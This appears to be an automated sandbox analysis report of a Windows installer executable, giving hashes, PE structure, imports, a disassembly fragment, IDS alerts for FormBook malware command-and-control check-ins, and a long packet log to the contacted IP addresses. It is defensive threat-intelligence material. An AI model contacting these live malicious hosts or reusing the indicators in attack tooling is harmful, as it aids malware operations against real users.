Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.828311562814192
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Forhandlingsfriheden.exe
File size:	801'513 bytes
MD5:	b149b18be3fec4cf93173c200384222c
SHA1:	f9e248a8612781c407537750d4cdd515798edc34
SHA256:	a1f2a8771d4075b694648ebb4cdd11bb2db213a947f8d08d6dca7a8710f651d7
SHA512:	6dec95032b50c615f05855f011af726c35008aa259911e45d73e817102ce5e13c1f202fb80fa703e564c96822b13bd696d4b0cc5ff5f07dddc1e0e11ba92baae
SSDEEP:	12288:UXqlVfD6qDmRHs0I5FcOM0hHaYLVC61UrV4PRklT3we+doWVkeehow:UXqzrTDmBsRkLYLV24QT31V1how
TLSH:	250501917A50123FC16D417BB2AB2B75DBABDFA802775801A223FF0BB5357617E08943
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN._...PN..PO.JPN._...PN..s~..PN..VH..PN.Rich.PN.........................PE..L....C.f.................f...".....

File Icon


Icon Hash:	71868ed4e8b04d49

Static PE Info

General

Entrypoint:	0x40351c
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x660843F3 [Sat Mar 30 16:55:15 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f4639a0b3116c2cfc71144b88a929cfd

Entrypoint Preview

Instruction
sub esp, 000003F8h
push ebp
push esi
push edi
push 00000020h
pop edi
xor ebp, ebp
push 00008001h
mov dword ptr [esp+20h], ebp
mov dword ptr [esp+18h], 0040A2D8h
mov dword ptr [esp+14h], ebp
call dword ptr [004080A4h]
mov esi, dword ptr [004080A8h]
lea eax, dword ptr [esp+34h]
push eax
mov dword ptr [esp+4Ch], ebp
mov dword ptr [esp+0000014Ch], ebp
mov dword ptr [esp+00000150h], ebp
mov dword ptr [esp+38h], 0000011Ch
call esi
test eax, eax
jne 00007F22848CE0FAh
lea eax, dword ptr [esp+34h]
mov dword ptr [esp+34h], 00000114h
push eax
call esi
mov ax, word ptr [esp+48h]
mov ecx, dword ptr [esp+62h]
sub ax, 00000053h
add ecx, FFFFFFD0h
neg ax
sbb eax, eax
mov byte ptr [esp+0000014Eh], 00000004h
not eax
and eax, ecx
mov word ptr [esp+00000148h], ax
cmp dword ptr [esp+38h], 0Ah
jnc 00007F22848CE0C8h
and word ptr [esp+42h], 0000h
mov eax, dword ptr [esp+40h]
movzx ecx, byte ptr [esp+3Ch]
mov dword ptr [00429AD8h], eax
xor eax, eax
mov ah, byte ptr [esp+38h]
movzx eax, ax
or eax, ecx
xor ecx, ecx
mov ch, byte ptr [esp+00000148h]
movzx ecx, cx
shl eax, 10h
or eax, ecx
movzx ecx, byte ptr [esp+0000004Eh]

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x84fc	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4d000	0x1f780	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2a8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6576	0x6600	1e4066ed6e7440cc449c401dfd9ca64f	False	0.6663219975490197	data	6.461246686118911	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1358	0x1400	f0b500ff912dda10f31f36da3efc8a1e	False	0.44296875	data	5.102094016108248	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x1fb38	0x600	2e1d49b2855a89e6218e118f0c182b81	False	0.5026041666666666	data	4.044293204800279	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x2a000	0x23000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x4d000	0x1f780	0x1f800	8e8a3197e2686a2d1e03890bd5970dad	False	0.5309554811507936	data	6.149455977169068	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x4d2f8	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 0	English	United States	0.25881343901573406
RT_ICON	0x5db20	0x9f42	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9983811626195732
RT_ICON	0x67a68	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	United States	0.4413900414937759
RT_ICON	0x6a010	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	United States	0.5112570356472795
RT_ICON	0x6b0b8	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	English	United States	0.6077868852459016
RT_ICON	0x6ba40	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	United States	0.650709219858156
RT_DIALOG	0x6bea8	0x100	data	English	United States	0.5234375
RT_DIALOG	0x6bfa8	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x6c0c8	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x6c190	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x6c1f0	0x5a	data	English	United States	0.7888888888888889
RT_VERSION	0x6c250	0x1f0	MS Windows COFF PowerPC object file	English	United States	0.5504032258064516
RT_MANIFEST	0x6c440	0x33e	XML 1.0 document, ASCII text, with very long lines (830), with no line terminators	English	United States	0.5542168674698795

Imports

DLL	Import
ADVAPI32.dll	RegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
SHELL32.dll	SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
ole32.dll	CoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
COMCTL32.dll	ImageList_Destroy, ImageList_AddMasked, ImageList_Create
USER32.dll	MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
GDI32.dll	GetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
KERNEL32.dll	lstrcmpiA, CreateFileW, GetTempFileNameW, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, WriteFile, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-10T13:53:13.567218+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.6	49850	212.162.149.66	80	TCP
2024-12-10T13:53:41.898306+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.6	49915	165.22.38.185	80	TCP
2024-12-10T13:53:59.133846+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	49954	154.88.22.104	80	TCP
2024-12-10T13:54:01.890375+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	49961	154.88.22.104	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 10, 2024 13:53:12.302031040 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:12.421711922 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:12.421797991 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:12.422146082 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:12.541621923 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:13.567116022 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:13.567136049 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:13.567148924 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:13.567159891 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:13.567173004 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:13.567218065 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:13.567261934 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:13.597273111 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:13.597295046 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:13.597306013 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:13.597373009 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:13.597491026 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:13.597502947 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:13.597547054 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:13.686558008 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:13.686639071 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:13.686750889 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:13.759238958 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:13.759284019 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:13.759321928 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:13.759342909 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:13.763366938 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:13.763408899 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:13.763427019 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:13.763459921 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:13.771884918 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:13.771933079 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:13.772008896 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:13.772054911 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:13.780687094 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:13.780749083 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:13.780802011 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:13.790256023 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:13.790316105 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:13.790368080 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:13.797250032 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:13.797347069 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:13.797378063 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:13.797430038 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:13.805150032 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:13.805217028 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:13.805264950 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:13.805309057 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:13.812408924 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:13.812477112 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:13.812539101 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:13.812572956 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:13.819871902 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:13.819928885 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:13.819962025 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:13.820017099 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:13.828414917 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:13.828459024 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:13.828485012 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:13.828526020 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:13.836639881 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:13.836698055 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:13.836704969 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:13.836733103 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:13.878767967 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:13.878829956 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:13.951797962 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:13.951854944 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:13.951913118 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:13.951962948 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:13.954392910 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:13.954440117 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:13.954468966 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:13.954514027 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:13.959161997 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:13.959175110 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:13.959209919 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:13.959222078 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:13.964066982 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:13.964121103 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:13.964145899 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:13.964184999 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:13.968987942 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:13.969044924 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:13.969046116 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:13.969083071 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:13.973902941 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:13.973952055 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:13.973982096 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:13.974028111 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:13.978702068 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:13.978749037 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:13.978811979 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:13.978856087 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:13.983067989 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:13.983124971 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:13.983165979 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:13.983217001 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:13.987750053 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:13.987798929 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:13.987817049 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:13.987864017 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:13.992512941 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:13.992563009 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:13.992599964 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:13.992649078 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:13.997297049 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:13.997347116 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:13.997411013 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:13.997459888 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.002134085 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.002182007 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.002353907 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.002403975 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.006844044 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.006895065 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.006925106 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.006963968 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.011872053 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.011930943 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.012116909 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.012168884 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.015646935 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.015686989 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.015701056 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.015738010 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.019232035 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.019294024 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.019356966 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.019414902 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.023078918 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.023106098 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.023128033 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.023147106 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.026807070 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.026854992 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.026884079 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.026923895 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.030642986 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.030692101 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.030749083 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.030796051 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.034589052 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.034603119 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.034650087 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.038247108 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.038288116 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.038296938 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.038331985 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.071316004 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.071367979 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.071398020 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.071441889 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.073193073 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.073242903 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.143506050 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.143573046 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.143578053 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.143626928 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.144994974 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.145045042 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.145138979 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.145179987 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.148211956 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.148260117 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.148344994 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.148391008 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.150964022 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.151011944 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.151026964 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.151072979 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.153904915 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.153949022 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.154063940 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.154105902 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.156774044 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.156821966 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.156910896 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.156955004 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.159578085 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.159625053 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.159778118 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.159818888 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.162322998 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.162372112 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.162458897 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.162504911 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.165122986 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.165189028 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.165332079 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.165379047 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.167814970 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.167860985 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.167954922 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.168000937 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.170397043 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.170443058 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.170480013 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.170525074 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.173012018 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.173057079 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.173139095 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.173178911 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.175685883 CET	80	49850	212.162.149.66	192.168.2.6
